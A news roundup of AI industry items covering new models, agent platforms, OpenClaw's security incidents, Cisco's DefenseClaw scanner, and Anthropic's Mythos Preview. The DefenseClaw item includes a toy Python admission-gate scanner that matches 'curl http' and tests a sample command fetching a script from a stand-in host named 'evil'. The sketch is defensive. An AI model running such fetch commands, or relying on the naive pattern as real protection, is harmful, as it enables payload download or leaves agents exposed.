Category: Top News

  • Google Released Its Most Advanced Audio and Voice Model, Gemini 3.1 Flash Live

    IBL News | New York

    Google announced Gemini 3.1 Flash Live, its most advanced multilingual audio and voice model.

    “This model delivers the speed and natural rhythm and dialogue needed for the next generation of voice-first AI,” said the company. “It’s also better at dynamically adjusting its response to users’ expressions of frustration or confusion and handles tasks in noisy environments.”

    3.1 Flash Live is available via Search Live and Gemini Live. For developers, it is in preview via the Gemini Live API in Google AI Studio; for enterprises, it is in Gemini Enterprise for Customer Experience.

    3.1 Flash Live lets people use their voice to vibe code and quickly iterate.

    All audio generated by 3.1 Flash Live is watermarked with SynthID. This imperceptible watermark is interwoven directly into the audio output, enabling reliable detection of AI-generated content and helping prevent misinformation.

  • “2026 Will Be the Year of Agents,” Said the Developer Who Created OpenClaw

    IBL News | New York

    Peter Steinberger, the Austrian programmer who created OpenClaw [in the picture], said, “2026 will be the year of agents.”

    “2023-2024 was the year of ChatGPT; last year was the year of the coding agent, this year’s going to be the year of the general agent,” he explained.

    Jensen Huang, CEO at Nvidia, last month hailed the tool—whose symbol is a bright red lobster—as “the next ChatGPT.”

    However, the buzz has raised concerns about the cybersecurity risks of allowing AI systems, which are vulnerable to hacking, to access personal data such as bank details.

    Steinberger built OpenClaw in November while playing around with AI coding tools to organize his digital life.

    He has since been hired by OpenAI “to drive the next generation of personal agents,” Sam Altman said in February.

    “The next AI innovation could come from someone who just wants to have fun,” Steinberger said.

  • “OpenAI Is Deploying a Technology that Manipulates Users at No Cost,” Writes a Former Researcher in the NYT

    IBL News | New York

    Zoë Hitzig, a former OpenAI researcher, wrote an op-ed in The New York Times denouncing how the San Francisco-based company is deploying a technology that manipulates users at no cost. “I have deep reservations about OpenAI’s strategy,” she wrote.

    Her concerns increased after OpenAI decided to include ads in ChatGPT, “creating a potential for manipulating users in ways we don’t have the tools to understand, let alone prevent.”

    “Tech companies can pursue options that limit incentives to surveil, profile, and manipulate their users.”

    “The erosion of OpenAI’s own principles to maximize engagement may already be underway. It’s against company principles to optimize user engagement solely to generate more advertising revenue, but it has been reported that the company already optimizes for daily active users anyway, likely by encouraging the model to be more flattering and sycophantic. This optimization can make users feel more dependent on A.I. for support in their lives. We’ve seen the consequences of dependence, including psychiatrists documenting instances of “chatbot psychosis” and allegations that ChatGPT reinforced suicidal ideation in some users.”

    The researcher suggests three possible approaches; one relies on cross-subsidies, using profits from one service or customer base to offset losses from another:

    • “If a business pays A.I. to do high-value labor at scale that was once the job of human employees — for example, a real-estate platform using A.I. to write listings or valuation reports — it should also pay a surcharge that subsidizes free or low-cost access for everyone else.”
    • “A second option is to accept advertising but pair it with real governance.”
    • “A third approach involves putting users’ data under independent control through a trust or cooperative with a legal duty to act in users’ interests.”

  • WordPress.com Introduced AI Agents that Can Create, Edit, and Manage Content

    IBL News | New York

    The WordPress.com-hosted platform embraced AI agents to write and publish posts, landing pages, and About pages; manage comments; make structural changes; update and fix metadata; and organize content with tags and categories.

    With these new capabilities, websites can be created and run almost entirely by human-directed AI agents, lowering the barrier to setting up and maintaining websites.

    The new AI capabilities follow the introduction of the Model Context Protocol (MCP) on WordPress.com last fall, which allows applications to provide context to LLMs.

    With write capabilities, an AI agent driven by natural-language commands can:

    • Draft and publish blog posts: The user provides copy or describes what they want to publish, and the AI agent creates the post directly.
    • Build and update pages: Create landing pages, About pages, and more, complete with the site’s design specs and block patterns.
    • Manage comments: Approve, reply to, or clean up comments without ever opening the dashboard.
    • Organize the content: Create, rename, and restructure categories and tags across the site.
    • Update media metadata: Fix alt text, captions, and titles for better accessibility and SEO.

    Before creating content, the AI agent searches the theme’s design and understands its colors, fonts, spacing, and block patterns.

    To enable the new functionality, WordPress.com customers on paid plans (starting at $4) go to wordpress.com/mcp and toggle on the capabilities they want to use. They can then connect their preferred AI client, such as Claude, Cursor, ChatGPT, or any other MCP-enabled tool, and begin creating.
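    As an illustration of that last step, many MCP clients are configured with a small JSON file. The sketch below follows the common Claude Desktop `mcpServers` convention; the entry name, the `mcp-remote` bridge, and the server URL are hypothetical placeholders, not WordPress.com’s documented endpoint.

```json
{
  "mcpServers": {
    "my-wordpress-site": {
      "command": "npx",
      "args": ["-y", "mcp-remote", "https://example.wordpress.com/placeholder-mcp-endpoint"]
    }
  }
}
```

    Once the client restarts, the site’s write capabilities appear to the model as ordinary MCP tools.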

    WordPress provided some prompt examples to spark creativity.

  • Anthropic Announced ‘Claude Managed Agents’, a Tool to Automate Work Tasks

    IBL News | New York

    Anthropic announced on Wednesday the launch of Claude Managed Agents, an enterprise tool for building and deploying AI agents to automate work tasks.

    Managed Agents will come with a built-in sandboxed environment where the agent can securely spin up software projects. The product also allows developers to create agents that can run autonomously in the cloud for hours, monitor what other Claude agents are doing, and toggle permissions to allow agents to access specific tools.

    Competitor OpenAI, which is also preparing to go public this year, has an agent platform called Frontier.

    On Tuesday, Anthropic said that its annualized recurring revenue has surpassed $30 billion, roughly three times higher than it was in December 2025. The majority of the company’s recent revenue growth has come from Claude Platform and Claude Code.

  • Coding Is Being Automated by AI: Silicon Valley Got Hit First

    IBL News | New York

    In the era of AI agents, many Silicon Valley programmers are now barely programming.

    Computer programming has undergone many changes over its 80-year history. Now, coding itself is being automated, and Silicon Valley got hit first.

    The New York Times posted an analysis examining this phenomenon.

    Coding is perhaps the first form of industrialized human labor that AI can actually replace. AI-generated code, if it passes its tests and works, is worth as much as what humans get paid $200,000 or more a year to compose.

    Now, coding is becoming a conversation, a back-and-forth between software developers and their bots. The work of a developer is now more about judgment than creation; hardly anyone writes code by hand anymore.

    A coder is becoming more like an architect than a construction worker. Developers using AI focus on the overall shape of the software, how its features and facets work together.

    Because the agents can produce functioning code so quickly, their human overseers can experiment, trying things out to see what works and discarding what doesn’t.

    For most coders, working with AI means constantly chatting, in a complex and highly technical way, with agents, a kind of alien life form, as they tweak the codebase. An amateur can’t do it, for now.

    For now, it’s a delusion to imagine that your AI agent will generate a whole project at once.

    Developers are mostly weirdly enthusiastic about their new powers and increased productivity, although they can’t figure out what it means for the future of their profession.

    The reason is that software developers say their training and expertise are still needed: knowing how a big codebase ought to be structured and how to design the system. Several developers, in fact, suggested that the number of software jobs might grow.

    However, how things will shake out for professional coders themselves isn’t yet clear.

  • Cisco Launched ‘DefenseClaw’ Open-Source Security Tools for OpenClaw

    IBL News | New York

    Cisco this month launched DefenseClaw, a free, open-source security tool for OpenClaw that runs inside NVIDIA’s OpenShell.

    In mid-March, at its GTC 2026 conference, NVIDIA announced NemoClaw and OpenShell to address security issues.

    OpenShell provides the infrastructure-level sandbox that OpenClaw never had — kernel isolation, deny-by-default network access, YAML-based policy enforcement, and a privacy router that keeps sensitive data local.

    It’s out-of-process enforcement, meaning the controls live outside the agent and can’t be overridden by it.
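    A policy file in the spirit described above might look like the following sketch. Every key and value here is an illustrative assumption, not OpenShell’s actual schema; the point is that the sandbox, not the agent, reads and enforces it.

```yaml
# Hypothetical OpenShell-style policy; keys are illustrative, not the real schema.
network:
  default: deny              # deny-by-default network access
  allow:
    - host: api.example.com  # explicitly allow-listed endpoint
      ports: [443]
filesystem:
  default: deny
  allow:
    - path: /home/agent/workspace
      mode: read-write
privacy_router:
  keep_local:                # sensitive categories never leave the machine
    - credentials
    - personal_files
```

    Because enforcement lives in this outer layer, a compromised agent cannot simply rewrite its own permissions.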

    Cisco Systems is building on that foundation. Its AI Defense team published research showing how malicious skills exploit the trust model — through prompt injection, credential theft, and silent exfiltration — and released an open source Skill Scanner so the community could start vetting what they install.

    OpenShell gives users a sandbox for the operational layer.

    Sitting on top of OpenShell, Cisco introduced an open-source agentic governance layer, DefenseClaw, that scans everything before it runs. Every skill, every tool, every plugin, and every piece of code generated by the Claw gets scanned before it’s allowed into any Claw environment.

    The scan engine includes five tools: skill-scanner, mcp-scanner, a2a-scanner, CodeGuard static analysis, and an AI bill of materials generator. Nothing bypasses the admission gate.
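    A minimal sketch of how such an admission gate can work is below. The scanner logic and all names are invented for illustration (the real engine is the five tools above); the structural idea is simply that nothing runs until a scan returns no high-severity findings.

```python
from dataclasses import dataclass


@dataclass
class Finding:
    severity: str  # "low" or "high"
    detail: str


def scan(artifact: str) -> list[Finding]:
    """Stand-in for the real scanners (skill, MCP, code); flags a toy pattern."""
    findings = []
    if "curl http" in artifact:  # naive exfiltration heuristic, for illustration
        findings.append(Finding("high", "possible network exfiltration"))
    return findings


def admit(artifact: str) -> bool:
    """Deny admission if any high-severity finding exists."""
    return not any(f.severity == "high" for f in scan(artifact))


print(admit("echo hello"))             # benign skill: admitted
print(admit("curl http://evil/x.sh"))  # flagged: blocked at the gate
```

    Runtime monitoring, described next, repeats this kind of check continuously rather than only at install time.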

    DefenseClaw detects threats at runtime — not just at the gate. Claws are self-evolving systems. A skill that was clean on Tuesday can start exfiltrating data on Thursday. DefenseClaw doesn’t assume what passed admission stays safe — a content scanner inspects every message flowing in and out of the agent at the execution loop itself.

    Cisco explained:

    “DefenseClaw enforces block and allow lists — and enforcement is not advisory. When you block a skill, its sandbox permissions are revoked, its files are quarantined, and the agent gets an error if it tries to invoke it. When you block an MCP server, the endpoint is removed from the sandbox network allow-list, and OpenShell denies all connections. This happens in under two seconds, no restart required. These aren’t suggestions. They’re walls.”

    “And here’s the part that matters for anyone running Claws at scale: every claw is born observable.”

    “DefenseClaw connects to Splunk out of the box. Every scan finding, every block/allow decision, every prompt-response pair, every tool call, every policy enforcement action, every alert — it all streams into Splunk as structured events the moment your claw comes online. You don’t bolt on observability after the fact and hope you covered everything. The telemetry is there from the beginning. The goal is simple: if your claw does something — anything — there’s a record.”

    As an AI that reads personal files, manages tools, runs shell commands, and connects to platforms to build new capabilities, OpenClaw represents a paradigm shift — a new Jarvis — but it has also sparked one of the most concerning security crises in open-source history.

    Within three weeks of it going viral, OpenClaw suffered a wave of serious security incidents that forced nation-states, restricted agencies, and companies to stop running it.

    “I purposefully didn’t make OpenClaw simpler, but at the end of the day, if you build a hammer… You can hurt yourself. So should we not build hammers anymore?” explained the Austrian programmer who created OpenClaw.

    Some vulnerabilities seen included:

    • A critical remote code execution vulnerability; visiting a malicious webpage could hijack any agent.

    • 135,000+ exposed OpenClaw instances on the public internet.

    • A coordinated attack called ClawHavoc planted over 800 malicious skills in ClawHub — roughly 20 percent of the entire registry of productivity tools.

    • A security researcher created a malicious third-party skill that performed data exfiltration and prompt injection without user awareness, demonstrating security flaws in OpenClaw implementations.

    To its credit, OpenClaw has been transparent about the risks, and the team has patched issues rapidly. But the structural reality is problematic: an agent with full system access, broad network reach, and a community-contributed skill ecosystem is a magnet for hackers.

  • Anthropic Announced the Frontier Model “Claude Mythos Preview” to Secure the World’s Most Critical Software

    IBL News | New York

    Anthropic announced yesterday Project Glasswing, a new initiative focused on global safety and security on the software side.

    This new AI cybersecurity initiative has already garnered commitments from large technology companies, such as Apple, Amazon Web Services, Microsoft, Broadcom, Cisco, CrowdStrike, Google, JPMorgan Chase, the Linux Foundation, NVIDIA, and Palo Alto Networks.

    Participant companies building on Project Glasswing will have access to Claude Mythos Preview, a new general-purpose language model for computer security tasks, to enhance their security projects.

    According to Anthropic, “Mythos Preview will help secure the world’s most critical software and prepare the industry for the practices we all will need to adopt to keep ahead of cyberattackers.”

    The company said that Mythos Preview already found “thousands of high-severity vulnerabilities” in “every major operating system and web browser,” especially “in real open source codebases.”

    Project Glasswing will help companies put these capabilities “to work” and focus them on “defensive purposes” against significant threats.

    “Over 99% of the vulnerabilities we’ve found have not yet been patched, so it would be irresponsible for us to disclose details about them (per our coordinated vulnerability disclosure process). Yet even the 1% of bugs we are able to discuss give a clear picture of a substantial leap in what we believe to be the next generation of models’ cybersecurity capabilities—one that warrants substantial coordinated defensive action across the industry. We conclude our post with advice for cyber defenders today, and a call for the industry to begin taking urgent action in response.”

    “During our testing, we found that Mythos Preview is capable of identifying and then exploiting zero-day vulnerabilities in every major operating system and every major web browser when directed by a user to do so. The vulnerabilities it finds are often subtle or difficult to detect. Many of them are ten or twenty years old, with the oldest we have found so far being a now-patched 27-year-old bug in OpenBSD—an operating system known primarily for its security.”

    “Non-experts can also leverage Mythos Preview to find and exploit sophisticated vulnerabilities. Engineers at Anthropic with no formal security training have asked Mythos Preview to find remote code execution vulnerabilities overnight, and woken up the following morning to a complete, working exploit. In other cases, we’ve had researchers develop scaffolds that allow Mythos Preview to turn vulnerabilities into exploits without any human intervention.”

  • Google Introduced ‘Gemma 4’, an Advanced Open-Source AI Model

    IBL News | New York

    Google introduced an advanced open-source model, Gemma 4, under a commercially permissive Apache 2.0 license. This model has been built for advanced reasoning and agentic workflows, according to the company.

    Gemma 4 was released in four sizes: Effective 2B (E2B), Effective 4B (E4B), 26B Mixture of Experts (MoE), and 31B Dense.

    The 31B model currently ranks #3 among open models on the industry-standard Arena AI text leaderboard, while the 26B model holds the #6 spot.

    Gemma 4 models can run on Android devices and laptop GPUs.

    For agentic workflows, the models feature native support for function calling, structured JSON output, and system instructions, enabling the building of autonomous agents that can interact with various tools and APIs and execute workflows reliably.
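    The function-calling loop these features enable can be sketched in a few lines. Everything below (the tool schema shape, the simulated model reply, and the `dispatch` helper) is an illustrative assumption, not Gemma 4’s actual API; a real setup would send the schema to a local inference server and parse the model’s structured JSON output the same way.

```python
import json

# A tool schema the agent advertises to the model (shape is illustrative).
get_weather_tool = {
    "name": "get_weather",
    "description": "Return current weather for a city.",
    "parameters": {
        "type": "object",
        "properties": {"city": {"type": "string"}},
        "required": ["city"],
    },
}


def dispatch(call_json: str) -> str:
    """Parse a structured JSON function call emitted by the model and run it."""
    call = json.loads(call_json)
    if call["name"] == "get_weather":
        # Stub tool implementation; a real agent would call a weather API here.
        return f"Sunny in {call['arguments']['city']}"
    raise ValueError(f"unknown tool: {call['name']}")


# Simulated structured JSON output from the model instead of free text.
model_reply = '{"name": "get_weather", "arguments": {"city": "New York"}}'
print(dispatch(model_reply))  # prints "Sunny in New York"
```

    The tool result is then fed back to the model, which either calls another tool or produces the final answer.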

    Gemma 4 supports high-quality offline code generation, turning the user’s workstation into a local-first AI code assistant.

    The models natively process video and images, support variable resolutions, and excel at visual tasks such as OCR and chart understanding. Additionally, the E2B and E4B models feature native audio input for speech recognition and understanding.

    Gemma 4 offers longer context windows. The edge models feature a 128K context window, while the larger models offer up to 256K, allowing users to pass repositories or long documents in a single prompt.

    According to Google, these multimodal models run completely offline with near-zero latency on edge devices like phones, the Raspberry Pi, and the NVIDIA Jetson Orin Nano.

    Android developers can now prototype agentic flows in the AICore Developer Preview for forward compatibility with Gemini Nano 4.

    Google is offering Gemma 4 in Google AI Studio (31B and 26B MoE) or in Google AI Edge Gallery (E4B and E2B).

    First-generation Gemma models have registered over 400 million downloads, generating a Gemmaverse of more than 100,000 variants.

  • Anthropic Banned Subscription OAuth Tokens Across OpenClaw and Third-Party Agent Tools

    IBL News | New York

    Anthropic this month banned the use of subscription OAuth tokens across OpenClaw, Hermes, and other third-party agent tools. Using OpenClaw with Claude AI will also become more expensive due to Anthropic’s new policy changes.

    A newly published Legal and Compliance page on the Claude Code docs spelled it out:

    “Using OAuth tokens obtained through Claude Free, Pro, or Max accounts in any other product, tool, or service — including the Agent SDK — is not permitted and constitutes a violation of the Consumer Terms of Service.”

    Additionally, an email sent by Anthropic on Friday evening noted that, starting April 4th, users wouldn’t be able to use their Claude subscription limits and would need a “pay-as-you-go option” billed separately.

    With OpenClaw creator Peter Steinberger now employed by OpenAI, Anthropic is encouraging subscribers to use more of its own tools, like Claude Cowork.

    Alternatives to Claude plans include models with their own subscriptions, open-source LLMs that can be run locally, such as GLM 5, and other options, such as Minimax 2.7, KiloCode, and OpenAI’s Codex.